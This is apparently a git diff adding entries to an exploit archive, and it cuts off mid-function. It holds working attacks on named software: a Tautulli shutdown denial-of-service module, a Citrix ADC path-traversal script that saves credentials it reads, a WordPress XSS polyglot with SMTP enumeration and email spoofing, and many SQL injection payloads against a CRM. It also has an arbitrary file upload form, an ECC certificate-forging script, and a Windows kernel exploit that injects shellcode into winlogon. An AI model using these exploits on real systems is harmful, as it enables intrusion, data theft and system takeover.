*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
exit(1);
}
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_zero(addr - 4, sym);
return addr;
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address NULL bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return addr_old;
}
/*
* set_val(): copy a dword inside a buffer (little endian)
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0x000000ff);
buf[pos + 1] = (val & 0x0000ff00) >> 8;
buf[pos + 2] = (val & 0x00ff0000) >> 16;
buf[pos + 3] = (val & 0xff000000) >> 24;
}

38
exploits/multiple/webapps/47929.rb Executable file
View file

@ -0,0 +1,38 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service',
'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
'Author' => 'Ismail Tasdelen',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-19833'],
['EDB', '47785']
]
)
register_options([ Opt::RPORT(8181) ])
end
def run
res = send_request_raw({
'method' => 'GET',
'uri' => '/shutdown'
})
if res
print_status("Request sent to #{rhost}")
else
print_status("No reply from #{rhost}")
end
rescue Errno::ECONNRESET
print_status('Connection reset')
end
end

130
exploits/multiple/webapps/47930.txt Normal file
View file

@ -0,0 +1,130 @@
# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal
# Date: 2019-12-17
# CVE: CVE-2019-19781
# Vulenrability: Path Traversal
# Vulnerablity Discovery: Mikhail Klyuchnikov
# Exploit Author: Dhiraj Mishra
# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0
# Vendor Homepage: https://www.citrix.com/
# References: https://support.citrix.com/article/CTX267027
# https://github.com/nmap/nmap/pull/1893
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local table = require "table"
local string = require "string"
local vulns = require "vulns"
local nmap = require "nmap"
local io = require "io"
description = [[
This NSE script checks whether the traget server is vulnerable to
CVE-2019-19781
]]
---
-- @usage
-- nmap --script https-citrix-path-traversal -p <port> <host>
-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args
output='file.txt'
-- @output
-- PORT STATE SERVICE
-- 443/tcp open http
-- | CVE-2019-19781:
-- | Host is vulnerable to CVE-2019-19781
-- @changelog
-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)
-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)
-- @xmloutput
-- <table key="NMAP-1">
-- <elem key="title">Citrix ADC Path Traversal aka (Shitrix)</elem>
-- <elem key="state">VULNERABLE</elem>
-- <table key="description">
-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,
11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path
-- traversal vulnerability that allows attackers to read configurations or
any other file.
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="year">2019</elem>
-- <elem key="day">17</elem>
-- <elem key="month">12</elem>
-- </table>
-- </table>
-- <elem key="disclosure">17-12-2019</elem>
-- <table key="extra_info">
-- </table>
-- <table key="refs">
-- <elem>https://support.citrix.com/article/CTX267027</elem>
-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>
-- </table>
-- </table>
author = "Dhiraj Mishra (@RandomDhiraj)"
Discovery = "Mikhail Klyuchnikov (@__Mn1__)"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "intrusive","vuln"}
portrule = shortport.ssl
action = function(host,port)
local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil
local vuln = {
title = 'Citrix ADC Path Traversal',
state = vulns.STATE.NOT_VULN,
description = [[
Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,
12.1, and 13.0 are vulnerable
to a unauthenticated path traversal vulnerability that allows attackers to
read configurations or any other file.
]],
references = {
'https://support.citrix.com/article/CTX267027',
'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',
},
dates = {
disclosure = {year = '2019', month = '12', day = '17'},
},
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local path = "/vpn/../vpns/cfg/smb.conf"
local response
local output = {}
local success = "Host is vulnerable to CVE-2019-19781"
local fail = "Host is not vulnerable"
local match = "[global]"
local credentials
local citrixADC
response = http.get(host, port.number, path)
if not response.status then
stdnse.print_debug("Request Failed")
return
end
if response.status == 200 then
if string.match(response.body, match) then
stdnse.print_debug("%s: %s GET %s - 200 OK",
SCRIPT_NAME,host.targetname or host.ip, path)
vuln.state = vulns.STATE.VULN
citrixADC = (("Path traversal: https://%s:%d%s"):format(host.targetname
or host.ip,port.number, path))
if outputFile then
credentials = response.body:gsub('%W','.')
vuln.check_results = stdnse.format_output(true, citrixADC)
vuln.extra_info = stdnse.format_output(true, "Credentials are being
stored in the output file")
file = io.open(outputFile, "a")
file:write(credentials, "\n")
else
vuln.check_results = stdnse.format_output(true, citrixADC)
end
end
elseif response.status == 403 then
stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname
or host.ip, path, response.status)
vuln.state = vulns.STATE.NOT_VULN
end
return vuln_report:make_output(vuln)
end

85
exploits/php/webapps/47925.txt Normal file
View file

@ -0,0 +1,85 @@
# Exploit Title: WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting
# Google Dork: inurl:/wp-content/plugins/postie/readme.txt
# Date: 2020-01-15
# Exploit Author: V1n1v131r4
# Vendor Homepage: https://postieplugin.com/
# Software Link: https://wordpress.org/plugins/postie/#developers
# Version: <=1.9.40
# Tested on: Linux
# CVE : CVE-2019-20203, CVE-2019-20204
## Identifying WordPress Postie Plugin installation
#!/bin/bash if curl -s -o /dev/null -w "%{http_code}" http://<domain.com>/wp-content/plugins/postie/readme.txt | grep 200 > /dev/null; then echo "" echo "Postie installed!" else echo "" echo "Postie seems not to be installed" fi
## Performing persistent XSS using Polyglot JavaScript syntax with crafted SVG (CVE-2019-20204)
# the syntax below should go as email body
jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(You've been hacked)//'>
## Email to post on Postie
- Identifying the mail server
dig domain.com mx
- enumerating accounts via SMTP
telnet domain.com 587
EHLO buddy
mail from:<sender@example.io>
rcpt to:<user@domain.com>
vrfy user@domain.com
- listing accounts via third party software
You can use these third party software and APIs to enumerate target email users:
- https://www.zerobounce.net
- https://tools.verifyemailaddress.io/
- https://hunter.io/email-verifier
## Spoofing with PHPMailer
<?php
/* CONFIGURE PHP IF NEEDED */
// ini_set("sendmail_from","$fromFull");
// ini_set("SMTP","mail.domain.com");
// ini_set('smtp_port',587);
// ini_set('username',"user");
// ini_set('password',"pass");
// COMPOSE
$to = 'postie@domain.com';
$subject = 'Title of your post';
$message = 'You've been hacked :-)';
// BASIC HEADER
$headers = 'From: wordpress.admin@domain.com' . "\r\n" .
'Reply-To: wordpress.admin@domain.com' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
// SEND AND SHOW MESSAGE
if (mail($to, $subject, $message, $headers)) echo $headers.'<h1>Mail sent!</h1>';
else echo '<h1>Something went wrong...</h1>';
// FULL HEADER
// $headers = "From: testsite < mail@testsite.com >\n";
// $headers .= "Cc: testsite < mail@testsite.com >\n";
// $headers .= "X-Sender: testsite < mail@testsite.com >\n";
// $headers .= 'X-Mailer: PHP/' . phpversion();
// $headers .= "X-Priority: 1\n";
// $headers .= "Return-Path: mail@testsite.com\n";
// $headers .= "MIME-Version: 1.0\r\n";
// $headers .= "Content-Type: text/html; charset=iso-8859-1\n";
?>

45
exploits/php/webapps/47926.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection
# Google Dork: N/A
# Date: 2020-01-15
# Blog: https://fatihhcelik.blogspot.com/
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.5.2
# Tested on: Kali Linux
# CVE : N/A
# Request,
POST /ruko/index.php?module=items/listing HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/ruko/index.php?module=reports/view&reports_id=68%27
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 330
Connection: close
Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver
redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1
# PAYLOADS,
# Parameter: reports_id (POST)
# Type: boolean-based blind
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' RLIKE (SELECT (CASE WHEN (9654=9654) THEN 68 ELSE 0x28 END))-- AlKt&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 8112 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(8112=8112,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rVyr&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 4324 FROM (SELECT(SLEEP(5)))KySi)-- Pfwf&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1

22
exploits/php/webapps/47928.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload
# Google Dork: N/A
# Date: 2020-01-16
# Exploit Author: Or4nG.M4n aka S4udiExploit
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: MY MIND v1.23.45
# CVE: N/A
# WWW . SEC4EVER . COM
-> hola amigos ^.^
-> just copy this html code
<form method="post" action="http://TARGET/edit_book.php" enctype="multipart/form-data">
<td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td>
<td><input type="text" name="author" value="Or4nG.M4n aka S4udiExploit" required></td>
<td><input type="file" name="image"></td>
<input type="submit" name="save_change" value="Change" class="btn btn-primary">
</form>
-> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php
# i think am back %^_^%
# i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com
# big thanks to Stupid Coder ^.^

48
exploits/php/webapps/47931.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection
# Google Dork: N/A
# Date: 2020-01-15
# Blog: https://fatihhcelik.blogspot.com/
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.5.2
# Tested on: Kali Linux
# CVE : N/A
# Request,
GET /ruko/index.php?module=entities/fields&entities_id=25 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/ruko/index.php?module=entities/fields&entities_id=25
Connection: close
Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
# PAYLOADS,
# Parameter: entities_id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
Payload: module=entities/fields&entities_id=25' AND 2091=2091 AND 'emRY'='emRY
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: module=entities/fields&entities_id=25' AND (SELECT 2023 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(2023=2023,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZZpM'='ZZpM
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: module=entities/fields&entities_id=25' AND (SELECT 5681 FROM (SELECT(SLEEP(5)))rdOz) AND 'vWza'='vWza
# Type: UNION query
# Title: Generic UNION query (NULL) - 23 columns
Payload: module=entities/fields&entities_id=25' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b706a71,0x5a664143527068525459496254624c514e45694d42776a6d67614a68434c6762434f62514d4f4566,0x7162787871),NULL-- syQw

57
exploits/php/webapps/47934.txt Normal file
View file

@ -0,0 +1,57 @@
# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection
# Google Dork: N/A
# Date: 2020-01-15
# Blog: https://fatihhcelik.blogspot.com/
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.5.2
# Tested on: Kali Linux
# CVE : N/A
# Request,
POST /ruko/index.php?module=tools/users_login_log&action=listing HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/ruko/index.php?module=tools/users_login_log
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 125
Connection: close
Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver
page=1&filters%5B0%5D%5Bname%5D=type&filters%5B0%5D%5Bvalue%5D=1&filters%5B1%5D%5Bname%5D=users_id&filters%5B1%5D%5Bvalue%5D=
# PAYLOADS,
# Parameter: filters[1][value] (POST)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(6543=6543,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ApLW
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 1479 FROM (SELECT(SLEEP(5)))WpOr)-- kARm
# Parameter: filters[0][value] (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: page=1&filters[0][name]=type&filters[0][value]=-6686' OR 4511=4511#&filters[1][name]=users_id&filters[1][value]=1
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 4167 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(4167=4167,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQyo&filters[1][name]=users_id&filters[1][value]=1
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 6373 FROM (SELECT(SLEEP(5)))ytRS)-- QpIm&filters[1][name]=users_id&filters[1][value]=1

23
exploits/windows/local/47933.rb Executable file
View file

@ -0,0 +1,23 @@
# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47933.zip
require 'openssl'
raw = File.read "ca.crt"
ca_cert = OpenSSL::X509::Certificate.new(raw)
# Parse public key from CA
ca_key = ca_cert.public_key
if !(ca_key.instance_of? OpenSSL::PKey::EC) then
puts "CA NOT ECC"
puts "Type: " + key.inspect
exit
end
# Set new group with fake generator G = Q
ca_key.private_key = 1
group = ca_key.group
group.set_generator(ca_key.public_key, group.order, group.cofactor)
group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE
ca_key.group = group
puts ca_key.to_pem

707
exploits/windows_x86-64/local/47935.cpp Normal file
View file

@ -0,0 +1,707 @@
/*
The exploit works on 19H1.
It was tested with ntoskrnl version 10.0.18362.295
EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47935.zip
*/
#include <Windows.h>
#include <stdio.h>
#include <string>
#include <ntstatus.h>
#include <processthreadsapi.h>
#include <winternl.h>
#include <tlhelp32.h>
#pragma comment(lib, "ntdll.lib")
// run cmd.exe
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51" \
"\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \
"\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0" \
"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed" \
"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" \
"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44" \
"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" \
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" \
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" \
"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" \
"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a" \
"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" \
"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" \
"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" \
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47" \
"\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65" \
"\x78\x65\x00";
static const unsigned int shellcode_len = 0x1000;
#define MAXIMUM_FILENAME_LENGTH 255
#define SystemModuleInformation 0xb
#define SystemHandleInformation 0x10
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
void* Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handels[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
typedef struct SYSTEM_MODULE {
ULONG Reserved1;
ULONG Reserved2;
#ifdef _WIN64
ULONG Reserved3;
#endif
PVOID ImageBaseAddress;
ULONG ImageSize;
ULONG Flags;
WORD Id;
WORD Rank;
WORD w018;
WORD NameOffset;
CHAR Name[MAXIMUM_FILENAME_LENGTH];
}SYSTEM_MODULE, * PSYSTEM_MODULE;
typedef struct SYSTEM_MODULE_INFORMATION {
ULONG ModulesCount;
SYSTEM_MODULE Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
// exploit specific type information
typedef struct _FILE_FULL_EA_INFORMATION {
ULONG NextEntryOffset; // +0x0
UCHAR Flags; // +4
UCHAR EaNameLength; // +5
USHORT EaValueLength; // +6
CHAR EaName[1]; // +9
} FILE_FULL_EA_INFORMATION, * PFILE_FULL_EA_INFORMATION;
typedef struct _PROC_DATA {
HANDLE apcthread; // +0x0
void* unknown1; // +0x8
void* unknown2; // +0x10
void* unknown3; // +0x18
void* unknown4; // +0x20
} PROC_DATA, * PPROC_DATA;
typedef struct _SOCK_DATA {
HANDLE unknown; // +0x0
HANDLE procDataHandle; // +0x8
} SOCK_DATA, * PSOCK_DATA;
// undocumented apis definitions
typedef NTSTATUS(WINAPI* NtWriteFile_t)(HANDLE FileHandle,
HANDLE Event,
PIO_APC_ROUTINE ApcRoutine,
PVOID ApcContext,
PIO_STATUS_BLOCK IoStatusBlock,
PVOID Buffer,
ULONG Length,
PLARGE_INTEGER ByteOffset,
PULONG key);
typedef NTSTATUS(WINAPI* NtTestAlert_t)(void);
typedef NTSTATUS(WINAPI* RtlGetVersion_t)(PRTL_OSVERSIONINFOW lpVersionInformation);
// resolved function pointers at runtime
NtTestAlert_t g_NtTestAlert = 0;
NtWriteFile_t g_NtWriteFile = 0;
RtlGetVersion_t g_RtlGetVersion = 0;
HANDLE g_Event1 = NULL;
HANDLE g_Event2 = NULL;
HANDLE g_Event3 = NULL;
int g_done1 = 0;
int g_done2 = 0;
#define TOKEN_OFFSET 0x40 //_SEP_TOKEN_PRIVILEGES offset
#define OFFSET_LINKEDLIST 0xA8 //kthread apc offset
// generic helper function
void InjectToWinlogon()
{
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
int pid = -1;
if (Process32First(snapshot, &entry))
{
while (Process32Next(snapshot, &entry))
{
if (_strcmpi(entry.szExeFile, "winlogon.exe") == 0)
{
pid = entry.th32ProcessID;
break;
}
}
}
CloseHandle(snapshot);
if (pid < 0)
{
printf("Could not find process\n");
return;
}
HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (!h)
{
printf("Could not open process: %x", GetLastError());
return;
}
void* buffer = VirtualAllocEx(h, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!buffer)
{
printf("[-] VirtualAllocEx failed\n");
}
if (!buffer)
{
printf("[-] remote allocation failed");
return;
}
if (!WriteProcessMemory(h, buffer, shellcode, sizeof(shellcode), 0))
{
printf("[-] WriteProcessMemory failed");
return;
}
HANDLE hthread = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0);
if (hthread == INVALID_HANDLE_VALUE)
{
printf("[-] CreateRemoteThread failed");
return;
}
}
HMODULE GetNOSModule()
{
HMODULE hKern = 0;
hKern = LoadLibraryEx("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
return hKern;
}
DWORD64 GetModuleAddr(const char* modName)
{
PSYSTEM_MODULE_INFORMATION buffer = (PSYSTEM_MODULE_INFORMATION)malloc(0x20);
DWORD outBuffer = 0;
NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, 0x20, &outBuffer);
if (status == STATUS_INFO_LENGTH_MISMATCH)
{
free(buffer);
buffer = (PSYSTEM_MODULE_INFORMATION)malloc(outBuffer);
status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, outBuffer, &outBuffer);
}
if (!buffer)
{
printf("[-] NtQuerySystemInformation error\n");
return 0;
}
for (unsigned int i = 0; i < buffer->ModulesCount; i++)
{
PVOID kernelImageBase = buffer->Modules[i].ImageBaseAddress;
PCHAR kernelImage = (PCHAR)buffer->Modules[i].Name;
if (_stricmp(kernelImage, modName) == 0)
{
free(buffer);
return (DWORD64)kernelImageBase;
}
}
free(buffer);
return 0;
}
DWORD64 GetKernelPointer(HANDLE handle, DWORD type)
{
PSYSTEM_HANDLE_INFORMATION buffer = (PSYSTEM_HANDLE_INFORMATION) malloc(0x20);
DWORD outBuffer = 0;
NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, 0x20, &outBuffer);
if (status == STATUS_INFO_LENGTH_MISMATCH)
{
free(buffer);
buffer = (PSYSTEM_HANDLE_INFORMATION) malloc(outBuffer);
status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, outBuffer, &outBuffer);
}
if (!buffer)
{
printf("[-] NtQuerySystemInformation error \n");
return 0;
}
for (size_t i = 0; i < buffer->NumberOfHandles; i++)
{
DWORD objTypeNumber = buffer->Handels[i].ObjectTypeNumber;
if (buffer->Handels[i].ProcessId == GetCurrentProcessId() && buffer->Handels[i].ObjectTypeNumber == type)
{
if (handle == (HANDLE)buffer->Handels[i].Handle)
{
//printf("%p %d %x\n", buffer->Handels[i].Object, buffer->Handels[i].ObjectTypeNumber, buffer->Handels[i].Handle);
DWORD64 object = (DWORD64)buffer->Handels[i].Object;
free(buffer);
return object;
}
}
}
printf("[-] handle not found\n");
free(buffer);
return 0;
}
DWORD64 GetGadgetAddr(const char* name)
{
DWORD64 base = GetModuleAddr("\\SystemRoot\\system32\\ntoskrnl.exe");
HMODULE mod = GetNOSModule();
if (!mod)
{
printf("[-] leaking ntoskrnl version\n");
return 0;
}
DWORD64 offset = (DWORD64)GetProcAddress(mod, name);
DWORD64 returnValue = base + offset - (DWORD64)mod;
FreeLibrary(mod);
return returnValue;
}
/*
After the bug is triggerd the first thime, this threads gets notified and it will trigger its function pointer,
which will call our gadget function and write the first 8 bytes.
*/
DWORD WINAPI APCThread1(LPVOID lparam)
{
SetEvent(g_Event1);
while (1)
{
if (g_done1)
{
printf("[+] triggering first APC execution\n");
g_NtTestAlert();
